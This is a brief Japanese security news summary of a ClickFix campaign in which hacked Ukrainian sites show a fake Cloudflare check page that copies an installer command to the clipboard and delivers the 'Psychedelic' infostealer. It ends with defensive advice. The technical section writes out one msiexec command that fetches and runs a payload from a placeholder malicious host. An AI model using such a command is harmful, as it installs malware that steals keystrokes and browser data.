概要
ウクライナの正規サイトが改ざんされ、偽のCloudflare検証ページが表示されます。訪問者が指示に従うと、クリップボードにWindowsインストーラコマンドがコピーされ、実行すると「Psychedelic」という情報窃盗マルウェアがダウンロードされます。攻撃はClickFixというキャンペーンで実施されています。
技術的詳細・特徴
攻撃者はサーバーにスクリプトを埋め込み、アクセス時に偽のCloudflare「I’m under attack」ページを返します。ページ内のボタンがクリックされると、JavaScriptでmsiexec /i https://malicious.example.com/psychedelic.msi のコマンドをクリップボードにコピーし、貼り付け実行を促します。マルウェアは未公開の情報窃盗型で、キー入力やスクリーンショット、ブラウザデータを収集します。
影響・対策方法
- 正規サイトでも偽の検証ページが表示されるため、URLや証明書を必ず確認する。
- 不審なコピーコマンドは貼り付けず、実行前にファイルのハッシュや出所を検証する。
- ブラウザの拡張機能やセキュリティソフトでクリップボード操作を監視する。
- Webサーバーの改ざん検知と定期的なファイル整合性チェックを導入する。
出典
情報元: The Hacker News